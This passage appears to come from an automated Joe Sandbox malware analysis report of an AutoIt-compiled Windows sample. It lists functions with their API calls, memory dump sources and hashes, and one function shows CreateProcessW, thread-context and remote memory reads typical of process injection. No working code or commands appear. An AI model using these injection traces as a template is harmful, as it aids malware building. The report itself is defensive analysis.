                                              • GetLastError.KERNEL32(?,00DA85CC,?,00E38CC8,0000000C), ref: 00DA870E
                                              • __dosmaperr.LIBCMT ref: 00DA8739
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CloseErrorHandleLast__dosmaperr
                                              • String ID:
                                              • API String ID: 2583163307-0
                                              • Opcode ID: 24567cac18c61fd02e7566b85c0c994945f422cdef4e36cee3fa1545b4f624f8
                                              • Instruction ID: f5aa0b84cf56ffb2fae20be2a6a77228cb5889f9134cf31d4939b282d703eb22
                                              • Opcode Fuzzy Hash: 24567cac18c61fd02e7566b85c0c994945f422cdef4e36cee3fa1545b4f624f8
                                              • Instruction Fuzzy Hash: 6501D633A056602AEA646334B845B7E67498BC3774F3D0269FD149B1D2DEB5CC85A1B0
                                              Function 00D7DB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • TranslateMessage.USER32(?), ref: 00D7DB7B
                                              • DispatchMessageW.USER32(?), ref: 00D7DB89
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D7DB9F
                                              • Sleep.KERNEL32(0000000A), ref: 00D7DBB1
                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 00DC1CC9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                              • String ID:
                                              • API String ID: 3288985973-0
                                              • Opcode ID: 997c9d2127918eb72c11b9ddba40b032c5df13e99df35b9db2c248630c497a71
                                              • Instruction ID: 4b5800adb577dd7ee05e1dcae3f06aaf3a6982e2e76ca188be8c6e5aa08ba2e9
                                              • Opcode Fuzzy Hash: 997c9d2127918eb72c11b9ddba40b032c5df13e99df35b9db2c248630c497a71
                                              • Instruction Fuzzy Hash: 6EF0DA306443459AEB34DB619C49FAA73B9EF89310F644619F65AA30D0EB71A48C8B25
                                              Function 00DE2FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00DE2CD4,?,?,?,00000004,00000001), ref: 00DE2FF2
                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00DE2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DE3006
                                              • CloseHandle.KERNEL32(00000000,?,00DE2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DE300D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: File$CloseCreateHandleTime
                                              • String ID:
                                              • API String ID: 3397143404-0
                                              • Opcode ID: bac230bcc054d1bc80860cbbc320c39d3cd5310a7c38b9ecff1a46982e00d049
                                              • Instruction ID: fb0286c6d805f7d209f4f79f2ede05ca3dbd2f8eec7b762a76e0b356dddd7c25
                                              • Opcode Fuzzy Hash: bac230bcc054d1bc80860cbbc320c39d3cd5310a7c38b9ecff1a46982e00d049
                                              • Instruction Fuzzy Hash: A8E086322812147BD2302756BC0DF8B3A2CD78AB75F204310F759760D046A1154542A8
                                              Function 00D81310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                              Download Yara Rule
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 00D817F6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Init_thread_footer
                                              • String ID: CALL
                                              • API String ID: 1385522511-4196123274
                                              • Opcode ID: 2fbae41be3d4871314571bae184964676f48ad6453ce55feb0d45b48daeb7bdd
                                              • Instruction ID: 687d50d5a4f0090f1c24f2d8f5d274d97ac66fffe3ba0e43d7a3521bde80fde8
                                              • Opcode Fuzzy Hash: 2fbae41be3d4871314571bae184964676f48ad6453ce55feb0d45b48daeb7bdd
                                              • Instruction Fuzzy Hash: 7E227A746082419FC714EF14C481B2ABBF5FF85314F28896DF59A9B3A1D731E84ACB62
                                              Function 00DE6EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                                              Download Yara Rule
                                              APIs
                                              • _wcslen.LIBCMT ref: 00DE6F6B
                                                • Part of subcall function 00D74ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74EFD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: LibraryLoad_wcslen
                                              • String ID: >>>AUTOIT SCRIPT<<<
                                              • API String ID: 3312870042-2806939583
                                              • Opcode ID: 5ecb06ab2bf0947fa23f5c11d4d5cc5b64efbe36d9b1c03980c3894b81ba362f
                                              • Instruction ID: 1ec7a4f705d736253738df27c1358366f66e30d734857519817cffddc3327269
                                              • Opcode Fuzzy Hash: 5ecb06ab2bf0947fa23f5c11d4d5cc5b64efbe36d9b1c03980c3894b81ba362f
                                              • Instruction Fuzzy Hash: 79B18D315086419FCB14EF24C89296EB7E5EF94310F14895DF49A972A2FB30ED49CBB2
                                              Function 00DE2557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: __fread_nolock
                                              • String ID: EA06
                                              • API String ID: 2638373210-3962188686
                                              • Opcode ID: c8fc372f4993d1619702d05cc83c3b8f67325edeb6e36e8082d98183682892c1
                                              • Instruction ID: 94f546a549f080afaf8e0aa83ea292f947d73640a3e7e1dfb7fc56e8a28925cd
                                              • Opcode Fuzzy Hash: c8fc372f4993d1619702d05cc83c3b8f67325edeb6e36e8082d98183682892c1
                                              • Instruction Fuzzy Hash: 8A01B5729042587EDF18D7A8C856EBEBBF8DB05301F00455AF192D2181E5B4E608CB70
                                              Function 00D73837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D73908
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_
                                              • String ID:
                                              • API String ID: 1144537725-0
                                              • Opcode ID: f451e8b011a743d956ead8182c29b68ebc97f1c1903ea7b8505d53ae740fe78a
                                              • Instruction ID: d8d681232c47cb08c33751f1a920aad162a8ac90287688cc3799e2fe4ca662a9
                                              • Opcode Fuzzy Hash: f451e8b011a743d956ead8182c29b68ebc97f1c1903ea7b8505d53ae740fe78a
                                              • Instruction Fuzzy Hash: 15319170604301DFD720DF65D884797BBE8FB49708F04096EF5DA93240E771AA88DB62
                                              Function 00D75745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00D7949C,?,00008000), ref: 00D75773
                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00D7949C,?,00008000), ref: 00DB4052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: f4a26a44a75df0a967df2ca83fe4fafd5969daea7c79d7bf20e9bc07e39f5d81
                                              • Instruction ID: ad0ee2c833b044dbee749204f130fdab1aeeae628ca6fb2ee20cc0f1cdffd191
                                              • Opcode Fuzzy Hash: f4a26a44a75df0a967df2ca83fe4fafd5969daea7c79d7bf20e9bc07e39f5d81
                                              • Instruction Fuzzy Hash: 87018030245225BAE3345A2ADC0EF977F98EF027B4F14C300BA9D6A1E1D7F45854CBA1
                                              Function 00D76E14 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,?,?,?,?,00D79879,?,?,?), ref: 00D76E33
                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00D79879,?,?,?), ref: 00D76E69
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide
                                              • String ID:
                                              • API String ID: 626452242-0
                                              • Opcode ID: d9c65001929c60797e367c75562b7f8593c6078c914d0c20fa521ad09d9c768a
                                              • Instruction ID: 6d9757675698522d2ada945fb74ab075954e267a39c1f56b86845d28a18b337b
                                              • Opcode Fuzzy Hash: d9c65001929c60797e367c75562b7f8593c6078c914d0c20fa521ad09d9c768a
                                              • Instruction Fuzzy Hash: 8201DF713012017FEB196BAADC0BF7F7AADDB85300F14817EB10ADA1E1F9A0AC008630
                                              Function 0104250D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01042CCB
                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01042D61
                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01042D83
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1797146074.0000000001041000.00000040.00000020.00020000.00000000.sdmp, Offset: 01041000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1041000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                              • String ID:
                                              • API String ID: 2438371351-0
                                              • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                              • Instruction ID: c2d070d155f6a34e141afafa802a0c3855e3958a5c31b848ab8a51896d549f9f
                                              • Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                              • Instruction Fuzzy Hash: 4C12EF24A14658C6EB24DF64D8507DEB232FF68300F1051E9910DEB7A5E77A4F81CB5A
                                              Function 00D8FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction ID: ee8d4f29dfae04ae5d557f7d51529eff16f6fbd0bf55479bbea64909b28a712e
                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction Fuzzy Hash: DC310475A00109DBC718EF59D4C0969FBA6FF49300B2886A5E909CF656D731EEC1CBE0
                                              Function 00D74ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D74E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D74EDD,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74E9C
                                                • Part of subcall function 00D74E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D74EAE
                                                • Part of subcall function 00D74E90: FreeLibrary.KERNEL32(00000000,?,?,00D74EDD,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74EC0
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74EFD
                                                • Part of subcall function 00D74E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DB3CDE,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74E62
                                                • Part of subcall function 00D74E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D74E74
                                                • Part of subcall function 00D74E59: FreeLibrary.KERNEL32(00000000,?,?,00DB3CDE,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74E87
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Library$Load$AddressFreeProc
                                              • String ID:
                                              • API String ID: 2632591731-0
                                              • Opcode ID: e9c6ec2886830fa5d0392fbe370e0be30681981182231bfa8df125df69486ae0
                                              • Instruction ID: c053377e2ed96f8d9843547543c461f69e950cf7717d7f17126a1c4aba9fa86d
                                              • Opcode Fuzzy Hash: e9c6ec2886830fa5d0392fbe370e0be30681981182231bfa8df125df69486ae0
                                              • Instruction Fuzzy Hash: 9B11C132600205AADB15FB64DC12BADB7A5EF40710F20C42DF54AB61D1FFB09A459B70
                                              Function 00DA8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: __wsopen_s
                                              • String ID:
                                              • API String ID: 3347428461-0
                                              • Opcode ID: c7460c925c716567277cf16d2f247989a7b9c0610404cdc60a5bac026c9a82d9
                                              • Instruction ID: b638e84213c7b47d30b0e3b13aa7726646c4ff83dfd47d18ec77ac8ffd1ffe70
                                              • Opcode Fuzzy Hash: c7460c925c716567277cf16d2f247989a7b9c0610404cdc60a5bac026c9a82d9
                                              • Instruction Fuzzy Hash: 5711487590420AAFCF05DF58E94099A7BF9EF49300F144069FC08AB312DA30DA11DBA5
                                              Function 00D79A40 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00D7543F,?,00010000,00000000,00000000,00000000,00000000), ref: 00D79A9C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 03e54f0fb1c941887e1b6a3f9ca0d8513ab5ead130810303256fd93de299a578
                                              • Instruction ID: 78fae4efa8fa39ab3bc6b2adba2e1152fa345a5f39c63165a72e546121900e1c
                                              • Opcode Fuzzy Hash: 03e54f0fb1c941887e1b6a3f9ca0d8513ab5ead130810303256fd93de299a578
                                              • Instruction Fuzzy Hash: 251136322057059FDB208F0AC890B66B7F9EB44764F14C42EE99B8AA51D770E945CB60
                                              Function 00D9E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                              • Instruction ID: e9ca5c4c25e83889a064ded5a276ea6a2102a3fe44219c0ca10adfe141ce008a
                                              • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                              • Instruction Fuzzy Hash: E0F0F432511E10AADF317B6A8C05B5A3398DFA3330F140B15F820972D2DB70D8028ABA
                                              Function 00DA3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,?,00E41444), ref: 00DA3852
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
